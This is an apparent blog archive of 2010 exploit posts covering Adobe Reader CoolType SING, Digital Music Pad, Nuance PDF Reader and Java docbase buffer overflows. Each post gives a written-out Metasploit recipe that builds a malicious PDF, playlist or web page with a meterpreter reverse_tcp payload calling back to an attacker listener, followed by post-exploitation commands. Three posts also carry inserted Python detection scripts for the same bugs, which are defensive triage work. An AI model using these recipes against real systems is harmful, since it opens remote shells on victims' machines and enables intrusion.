Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour on 2010-09-06
Metasploit PoC provided on 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig
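The trigger for this bug is a SING table whose 28-byte uniqueName field carries no NUL terminator, so the copy into CoolType's fixed stack buffer runs past the field. The checker below is an added example, not code from the original post or from the Metasploit module: it walks the sfnt table directory of an already extracted font (the FontFile stream of a PDF, decompressed), locates the SING table and reports whether uniqueName is terminated. Field offsets follow Adobe's SING specification (uniqueName at offset 16, 28 bytes); the two fixture fonts are constructed in the block, and the "suspicious" threshold (no NUL anywhere in the field) is this example's own choice.

```python
"""Flag TrueType/OpenType fonts whose SING table has an unterminated uniqueName.

Added example for triage of fonts extracted from PDFs; not part of the post
or of the Metasploit module. Offsets follow the SING table specification.
"""
import struct

UNIQUE_NAME_OFFSET = 16   # after the 8 fixed 16-bit header fields
UNIQUE_NAME_LEN = 28      # uniqueName is a fixed 28-byte field


def find_table(font: bytes, tag: bytes):
    """Return (offset, length) of `tag` from the sfnt table directory, or None."""
    if len(font) < 12:
        return None
    num_tables = struct.unpack(">H", font[4:6])[0]
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            return None
        t, _checksum, off, length = struct.unpack(">4sIII", font[rec:rec + 16])
        if t == tag:
            return off, length
    return None


def check_sing(font: bytes) -> dict:
    """Describe the SING table's uniqueName field.

    'suspicious' is True when the 28-byte field has no NUL terminator at all,
    which is the condition the CVE-2010-2883 trigger relies on, or when the
    table is too short to hold the field.
    """
    found = find_table(font, b"SING")
    if found is None:
        return {"has_sing": False, "suspicious": False}
    off, length = found
    if length < UNIQUE_NAME_OFFSET + UNIQUE_NAME_LEN or off + length > len(font):
        return {"has_sing": True, "suspicious": True, "reason": "truncated SING table"}
    start = off + UNIQUE_NAME_OFFSET
    name = font[start:start + UNIQUE_NAME_LEN]
    terminated = b"\x00" in name
    return {"has_sing": True, "suspicious": not terminated,
            "uniqueName": name.split(b"\x00")[0]}


def make_sing(unique_name: bytes) -> bytes:
    """Constructed SING table (test fixture) with the given uniqueName.

    The name is padded with NULs, or cut, to exactly 28 bytes; a 28-byte input
    therefore yields an unterminated field.
    """
    # tableVersionMajor, tableVersionMinor, glyphletVersion, permissions,
    # mainGID, unitsPerEm, vertAdvance, vertOrigin
    fixed = struct.pack(">HHHhHHhh", 1, 0, 1, 0, 0, 1000, 0, 0)
    name = unique_name[:UNIQUE_NAME_LEN].ljust(UNIQUE_NAME_LEN, b"\x00")
    return fixed + name + b"\x00" * 16 + b"\x00"   # METAMD5 + nameLength


def build_font(sing_table: bytes) -> bytes:
    """Constructed minimal sfnt container holding only a SING table."""
    header = struct.pack(">IHHHH", 0x00010000, 1, 16, 0, 0)
    table_off = 12 + 16                       # header + one directory record
    directory = struct.pack(">4sIII", b"SING", 0, table_off, len(sing_table))
    return header + directory + sing_table


if __name__ == "__main__":
    print(check_sing(build_font(make_sing(b"glyphlet-1"))))   # terminated: not suspicious
    print(check_sing(build_font(make_sing(b"A" * 28))))       # unterminated: suspicious
```

Run it over fonts pulled out of FontFile streams; a hit on a font that Reader 9.3.4 or earlier would parse is worth a closer look, while a NUL inside the field does not by itself prove the font benign.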

EDB-ID-15134 : Digital Music Pad SEH overflow

Timeline :

Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall on 2010-09-17
Metasploit PoC provided on 2010-10-03

PoC provided by :

Abhishek Lyall

Reference(s) :

EDB-ID-15134

Affected version(s) :

Digital Music Pad 8.2.3.3.4

Tested on Windows XP SP3 with :

Digital Music Pad 8.2.3.3.4

Description :

This module exploits a buffer overflow in Digital Music Pad version 8.2.3.3.4. When opening a malicious pls file with Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.

Commands :

use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Timeline :

Vulnerability discovered by corelanc0d3r & rick2600 on 2010-04-03
Vulnerability disclosed to the vendor on 2010-04-08
Coordinated vulnerability disclosure on 2010-10-08
Metasploit PoC provided on 2010-10-08

PoC provided by :

corelanc0d3r
rick2600

Reference(s) :

OSVDB-68514

Affected version(s) :

Nuance PDF Reader 6.0

Tested on Windows XP SP3 with :

Nuance PDF Reader 6.0

Description :

This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/nuance_pdf_launch_overflow
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig
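Since this bug needs no JavaScript, the one thing a triage script can key on is the /Launch action itself and the length of the string it carries. The scanner below is an added example, not code from the original post or the Metasploit module: it finds every `/S /Launch` action in a raw (uncompressed) PDF, extracts the literal strings of the enclosing object with correct handling of escapes and nested parentheses, and reports actions whose longest string reaches a threshold. The 256-byte threshold and the two sample PDF objects are constructed for this example; the post does not state the size of Nuance's buffer.

```python
"""Report /Launch actions in a PDF whose string argument is unusually long.

Added triage example; not part of the post or of the Metasploit module.
Works on uncompressed object streams, so inflate /FlateDecode first.
"""
import re

LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
THRESHOLD = 256   # assumed cut-off; real launch paths are far shorter


def literal_strings(data: bytes):
    """Yield the contents of PDF literal strings '( ... )' found in data,
    honouring backslash escapes and balanced nested parentheses."""
    i, n = 0, len(data)
    while i < n:
        if data[i:i + 1] != b"(":
            i += 1
            continue
        depth, j = 1, i + 1
        start = j
        while j < n and depth:
            c = data[j:j + 1]
            if c == b"\\":          # escaped char: skip it and the next byte
                j += 2
                continue
            if c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
            j += 1
        # depth == 0 means j is just past the closing ')'; otherwise unterminated
        yield data[start:j - 1] if depth == 0 else data[start:j]
        i = j


def scan_launch_actions(pdf: bytes, threshold: int = THRESHOLD):
    """Return [(object_offset, longest_string_length)] for each /Launch action
    whose longest literal string is at least `threshold` bytes."""
    hits = []
    for m in LAUNCH_RE.finditer(pdf):
        # bound the search to the enclosing "N G obj ... endobj" object
        start = pdf.rfind(b" obj", 0, m.start())
        start = 0 if start == -1 else start
        end = pdf.find(b"endobj", m.end())
        end = len(pdf) if end == -1 else end
        longest = max((len(s) for s in literal_strings(pdf[start:end])), default=0)
        if longest >= threshold:
            hits.append((start, longest))
    return hits


# Constructed samples: a short launch target and a 300-byte one.
BENIGN_PDF = (b"1 0 obj\n<< /Type /Action /F (notepad.exe) /S /Launch >>\nendobj\n")
SUSPICIOUS_PDF = (b"2 0 obj\n<< /Type /Action /S /Launch /Win << /F ("
                  + b"A" * 300 + b") >> >>\nendobj\n")

if __name__ == "__main__":
    print(scan_launch_actions(BENIGN_PDF))       # []
    print(scan_launch_actions(SUSPICIOUS_PDF))   # one hit of length 300
```

Hex strings (`<...>`) are not measured here; add a second extractor if the samples you see use them. Any /Launch action at all is already a policy question for a document reader, independent of this specific overflow.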

CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow

Timeline :

Vulnerability discovered by Stephen Fewer and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2010-07-20
PoC provided by berendjanwever on 2010-08-31
Coordinated vulnerability disclosure on 2010-10-12
Metasploit PoC provided on 2010-10-25

PoC provided by :

jduck

Reference(s) :

CVE-2010-3552
ZDI-10-206

Affected version(s) :

All Oracle JRE versions prior to version 6 Update 22.

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 20

Description :

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code.

When the new plugin is invoked with a “launchjnlp” parameter, it will copy the contents of the “docbase” parameter to a stack buffer using the “sprintf” function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address.

NOTE: The string being copied is first passed through “WideCharToMultiByte”. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (‘?’).

This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn’t been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release.

Commands :

use exploit/windows/browser/java_docbase_bof
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
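The description gives a precise trigger condition: the plugin is invoked with a “launchjnlp” parameter and the “docbase” parameter, after WideCharToMultiByte conversion, exceeds the 256-byte stack buffer. The page scanner below is an added example, not code from the original post or the Metasploit module: it parses the applet, object and embed elements of an HTML page (the entry points the plugin is invoked through), collects those two parameters, and flags a launchjnlp invocation whose docbase is longer than 256 bytes once encoded. The local code page is assumed to be cp1252, and `errors="replace"` mirrors the advisory's note that characters without a multibyte representation become question marks; the sample pages are constructed.

```python
"""Flag HTML that invokes the Java new plugin with launchjnlp and an oversized docbase.

Added triage example; not part of the post or of the Metasploit module.
"""
from html.parser import HTMLParser

DOCBASE_LIMIT = 256        # size of the stack buffer named in the description
LOCAL_CODEPAGE = "cp1252"  # assumption: the victim's ANSI code page


class AppletParamScanner(HTMLParser):
    """Collect launchjnlp/docbase per applet, object or embed element."""

    def __init__(self):
        super().__init__()
        self.in_applet = False
        self.params = {}
        self.findings = []   # (tag, encoded docbase length)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag in ("applet", "object", "embed"):
            self.in_applet = True
            self.params = {}
            # object/embed may carry the parameters directly as attributes
            for k in ("launchjnlp", "docbase"):
                if a.get(k) is not None:
                    self.params[k] = a[k]
        elif tag == "param" and self.in_applet:
            name = (a.get("name") or "").lower()
            if name in ("launchjnlp", "docbase"):
                self.params[name] = a.get("value") or ""
        if tag == "embed":           # void element: no end tag will arrive
            self._finish(tag)

    def handle_endtag(self, tag):
        if tag in ("applet", "object") and self.in_applet:
            self._finish(tag)

    def _finish(self, tag):
        if "launchjnlp" in self.params:
            docbase = self.params.get("docbase", "")
            # Measure what sprintf would copy: the multibyte form, with
            # unrepresentable characters replaced by '?' as in WideCharToMultiByte.
            nbytes = len(docbase.encode(LOCAL_CODEPAGE, errors="replace"))
            if nbytes > DOCBASE_LIMIT:
                self.findings.append((tag, nbytes))
        self.in_applet = False
        self.params = {}


def scan_html(html: str):
    """Return a list of (element, docbase_byte_length) findings for the page."""
    p = AppletParamScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed samples.
BENIGN_HTML = ('<applet code="Demo.class"><param name="launchjnlp" value="1">'
               '<param name="docbase" value="http://www.example.com/app/"></applet>')
SUSPICIOUS_HTML = ('<applet code="Demo.class"><param name="launchjnlp" value="1">'
                   '<param name="docbase" value="' + "A" * 396 + '"></applet>')
NO_LAUNCHJNLP_HTML = ('<embed type="application/x-java-applet" docbase="'
                      + "A" * 396 + '">')

if __name__ == "__main__":
    print(scan_html(BENIGN_HTML))          # []
    print(scan_html(SUSPICIOUS_HTML))      # [('applet', 396)]
    print(scan_html(NO_LAUNCHJNLP_HTML))   # []: docbase alone is not the trigger
```

A docbase of a few hundred bytes is never a legitimate document base, so the check has a low false-positive rate; pages that build the applet tag from JavaScript at runtime need the rendered DOM rather than the static source.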